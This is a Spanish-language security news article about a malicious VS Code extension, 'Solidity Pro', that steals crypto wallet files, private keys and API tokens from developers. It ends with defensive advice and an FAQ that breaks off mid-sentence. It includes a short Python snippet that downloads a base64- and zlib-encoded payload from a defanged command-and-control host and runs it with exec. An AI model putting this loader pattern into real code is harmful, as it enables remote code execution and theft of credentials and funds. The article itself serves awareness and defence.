Extensión VS Code Maliciosa “Solidity Pro” Infecta a Desarrolladores Cripto con Malware Python

Una nueva extensión VS Code maliciosa llamada “Solidity Pro” está afectando a desarrolladores de criptomonedas. El paquete se disfraza de herramienta legítima para programar contratos inteligentes en Solidity. Sin embargo, oculta un payload en Python diseñado para robar credenciales y billeteras digitales.
Este incidente forma parte de una tendencia creciente de ataques a la cadena de suministro de software. Los ciberdelincuentes aprovechan la confianza en los marketplaces de extensiones oficiales. Por lo tanto, entender su funcionamiento resulta clave para cualquier programador que trabaje con blockchain.

¿Cómo funciona esta extensión VS Code maliciosa?

La extensión se publicó en el marketplace de Visual Studio Code imitando herramientas populares de desarrollo Solidity. Al instalarse, ofrece funcionalidades reales de resaltado de sintaxis y autocompletado. Esto reduce las sospechas iniciales del usuario.
Sin embargo, en segundo plano ejecuta un script en Python descargado desde un servidor remoto. Este script se activa mediante el hook de activación de la extensión, un evento estándar de VS Code. El malware recopila información sensible del sistema, incluyendo:

  • Archivos de configuración de billeteras (MetaMask, Ledger Live)
  • Claves privadas almacenadas en texto plano
  • Historial de navegador relacionado con exchanges
  • Variables de entorno con tokens de API

Cabe destacar que el payload se ofusca usando técnicas de encoding base64 y compresión zlib. Esto dificulta su detección por antivirus tradicionales. Un ejemplo simplificado del comportamiento observado sería:
“`python
import base64, zlib, requests
def fetch_payload(url):
data = requests.get(url).content
decoded = base64.b64decode(data)
return zlib.decompress(decoded)
exec(fetch_payload(“hxxp://c2-server[.]net/payload”))
“`
Este patrón permite actualizar el malware sin republicar la extensión, evadiendo revisiones estáticas del marketplace.

Aplicaciones y casos de uso reales

Los investigadores de seguridad identificaron más de 3.000 descargas antes de que Microsoft retirara la extensión. Además, se detectaron variantes dirigidas específicamente a desarrolladores que trabajan con Hardhat y Truffle, frameworks comunes en el ecosistema Ethereum.
En un caso documentado, un desarrollador freelance perdió acceso a una billetera con fondos en DeFi. El ataque ocurrió minutos después de instalar la extensión en un entorno de prueba conectado a su wallet principal. Este error, común entre programadores, facilita el robo de activos.
Otro caso relevante involucra equipos de startups Web3. Varios miembros instalaron la extensión desde un enlace compartido en un canal de Discord no oficial. Esto demuestra cómo la ingeniería social amplifica el alcance del ataque más allá del marketplace oficial.
Estos incidentes se suman a otros reportes sobre [seguridad informática](/noticias/categoria/seguridad-informatica) documentados recientemente en la industria del desarrollo blockchain.

Ventajas, limitaciones y comparativa

Desde la perspectiva del atacante, esta técnica ofrece ventajas notables. La distribución mediante extensiones aprovecha la confianza inherente en marketplaces verificados. Además, el uso de payloads dinámicos en Python complica el análisis forense tradicional.
Sin embargo, existen limitaciones importantes para los atacantes. Los sistemas de escaneo automatizado de Microsoft eventualmente detectaron patrones sospechosos en las solicitudes de red. En consecuencia, la extensión fue eliminada tras aproximadamente dos semanas de actividad.
Comparado con ataques similares, como el caso de paquetes npm maliciosos en 2023, este incidente muestra mayor sofisticación en la ofuscación. Mientras los ataques npm suelen usar scripts de instalación directos, esta campaña delega la ejecución maliciosa a un intérprete externo de Python. Esto añade una capa adicional de evasión.
Para contextualizar, este tipo de amenazas se relaciona con otras noticias sobre [criptomonedas](/noticias/categoria/criptomonedas) y ataques a billeteras digitales publicadas anteriormente.

Recursos y próximos pasos

Los desarrolladores deben adoptar prácticas defensivas concretas. Verificar el publicador de cada extensión antes de instalarla resulta esencial. Además, revisar el código fuente en repositorios públicos como [GitHub](https://github.com) ayuda a detectar comportamientos anómalos.
Microsoft mantiene documentación oficial sobre seguridad de extensiones en su [portal de VS Code](https://code.visualstudio.com/docs/editor/extension-marketplace). Asimismo, la Fundación Ethereum publica guías de seguridad para desarrolladores Solidity en su [wiki oficial](https://ethereum.org/es/developers/docs/smart-contracts/security/).
Se recomienda además usar entornos aislados como máquinas virtuales o contenedores Docker para probar extensiones nuevas. Esto limita el daño potencial en caso de infección. Consulta también nuestras publicaciones sobre [desarrollo blockchain](/noticias/categoria/blockchain) para más contexto sobre estas amenazas.

FAQ técnico

¿Cómo puedo detectar si instalé una extensión VS Code maliciosa?
Revisa el número de descargas, la reputación del publicador y los permisos solicitados. Herramientas como VSCode Extension Auditor analizan comportamientos sospechosos en tiempo de ejecución. También conviene monitorear conexiones de red inusuales generadas por VS Code.
¿Qué debo hacer si ya instalé “Solidity Pro”?
Desinstala la extensión inmediatamente y reinicia el editor. Cambia todas las claves privadas y contraseñas almacenadas en el sistema afectado. Considera formatear el entorno de desarrollo si manejaste

Leave a Reply

Your email address will not be published. Required fields are marked *

*